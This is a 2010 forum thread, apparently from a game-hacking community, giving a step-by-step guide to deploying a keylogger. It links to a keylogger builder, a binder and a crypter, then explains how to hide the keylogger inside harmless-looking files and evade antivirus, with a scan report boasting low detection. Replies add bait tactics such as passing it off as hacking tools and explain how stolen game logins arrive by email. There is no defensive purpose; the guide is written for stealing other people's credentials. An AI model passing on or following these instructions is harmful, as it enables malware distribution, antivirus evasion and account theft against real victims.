Jump to content

[Updated: 5/10/2010] Keylogger (full guide)


Recommended Posts

Posted

Topic updated on 5/10/2010 (crypter added)

 

 

Hi guys..

I searched around the forum for keylogger guides but I found nothing. I found "how to build a keylogger" topics but not a full guide. I am going to show you the full task of how to use a keylogger.

Ok I won't waste your time anymore. Let's start..

 

First you have to download some programs...

 

 

Emissary Keylogger

http://rapidshare.com/files/422310671/Emissary_Keylogger.rar

 

Napsterakos Binder

http://rapidshare.com/files/422311075/Napsterakos_Binder.rar

 

CorruptD Heaven Crypter

http://rapidshare.com/files/423242860/Crypter.rar

 

Icon Changer v3 (Not nessesary)

http://rapidshare.com/files/422311204/Icon_Changer_v3.rar

 

Fake Progs (Not nessesary)

http://rapidshare.com/files/422311242/Fake_Progs.rar

 

 

 

GUIDE

 

 

Build the server

Go to http://www.gmail.com/ and create an e-mail account or just use your own. You will get the victim's information by e-mail. Open "Emissary.exe" and type your gmail account. Then type the name of your server or leave it as it is "server.exe" (it must be .exe). "Interval" is the minutes the server waits before it sends you the information (if you type 5 it will send you an e-mail every 5 minutes). Now check the boxes "Add to startup" and "Antis", you can also check the other boxes or uncheck them, you choose. If you want you can add a fake error message but I do not recommend it. Now click on "Build" and you are done.

 

Bind the server

Binding is when you hide a program in another program. The two programs will run the same time but only one will be visible. You need to bind the server so the victim will open it and they will not understand it is a keylogger. Open "Napsterakos Binder.exe". Click on "Add File" at the "Primary File" line and choose the server. Then click on "Add File" at the "Secondary File" line and choose a program (choose a portable program, an installer, an image, a video etc.). Then click "Bind" and you are done. The binded file will be ".exe".

 

Crypt the server

Once you have binded the server you have to crypt it to avoid antivirus detection. Open "CorruptD Heaven Crypter.exe". Click on first "Browse" button and choose the binded file. Click on the second "Browse" button and choose "CarlsJR" from the "Crypter" folder. You can also check "Enable Icon Changer" to choose the icon of the crypted file or you can download "Icon Changer v3" which I share with you in this topic, you choose. Click on "Crypt" and you are done.

 

Icon Changer v3 (Not nessesary)

The crypted file will have an icon you should change if you want to. Open "Icon Changer v3.exe". Click on "Browse File" and choose the crypted file. Then you either choose "Choose Icon" to choose an icon from the program (not recommended) or "Browse Icon" to choose an icon from your computer. Now click on "Change Icon" and you are done.

 

Fake Progs (Not nessesary)

Fake Progs are, as the name says, fake programs which you can use to bind the server with. They do not work but you can tell the victim that you found some hacking programs and if they want to try them. When they run the fake program the server will run secretly and they will only see the program. Open one of those programs just to see how they look like. I repeat that they do not work.

 

 

!ATTENTION!

1) The crypted file is detected only by Avira Antivir.

2) You must disable your antivirus to work with the programs because it detects them as a virus.

 

 

Programs' photos

Emissary Keylogger --> http://img814.imageshack.us/img814/9443/emissary.png

Napsterakos Binder --> http://img199.imageshack.us/img199/1034/binderx.png

CorruptD Heaven Crypter --> http://img214.imageshack.us/img214/3669/90105012.png

Icon Changer v3 --> http://img96.imageshack.us/img96/6111/iconbe.png

 

Crypted Server Detection

File Info

 

Report date: 2010-10-05 14:33:44 (GMT 1)

File name: crypted-server-exe

File size: 5015040 bytes

MD5 Hash: 183a8b175350fb0b1d1f7b61fded327a

SHA1 Hash: 6091079af3028851a7e471fd82c7c91e65373b84

Detection rate: 1 on 16 (6%)

Status: INFECTED

 

Detections

 

a-squared -

Avast -

AVG -

Avira AntiVir - TR/ATRAPS.Gen

BitDefender -

ClamAV -

Comodo -

Dr.Web -

F-PROT6 -

Ikarus T3 -

Kaspersky -

NOD32 -

Panda -

TrendMicro -

VBA32 -

VirusBuster -

 

Scan report generated by

NoVirusThanks.org

 

 

[The guide is created by me. The programs were found on forums by me. For any question or explanation, please, post. Inform me if links expired or crypted server is getting detected by more antiviruses.]

Posted

you should add a fud crypter guide aswell

 

see the scan results of the binded file.. it's 2/16.. it's fud by binding

i searched for cryptes but they had higher detection level.. so you don't need crypter

Posted

very usefull i needed the binder cause  had one that was only for trial.

 

trial binder? wtf.. all the binders I have found are free..

 

//OnTopic

 

I will also upload a crypter (as you asked).. now the detection will be 1/16

Posted

Cool, now more mxc braindamaged members will lose their accs! :D

Good guide tho.

 

I don't think that an MxC member will try to steal the pass of another member.. and if so.. the real member can pm Maxtor ;)

 

yes

 

Can't you understand english? it's not something difficult

Posted

I dont get sth...

I followed every single step of ur guide, but I cant get how it's gonna work...

I mean, what I am supposed to do, in order to make the victim type his account ? (for example in a L2 server ?)

And how it's gonna be send to my gmail ?

TY :)

Posted

I dont get sth...

I followed every single step of ur guide, but I cant get how it's gonna work...

I mean, what I am supposed to do, in order to make the victim type his account ? (for example in a L2 server ?)

And how it's gonna be send to my gmail ?

TY :)

 

you don't make the victim to type his account..

you just send him the server (binded file) and when he runs it the server will send you whatever he does to the pc and whatever he types. if he press "asadsa" buttons you will get "asadsa" to the email. the server will send you what programs he runs and what he types when he uses the programs.. you will see something like that: L2.exe id password

it depends on how he writes it.. if he uses tab to switch between id and password bar you will see

 

l2.exe

id[TAB]password

 

if you still can't understand I will post a photo..

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...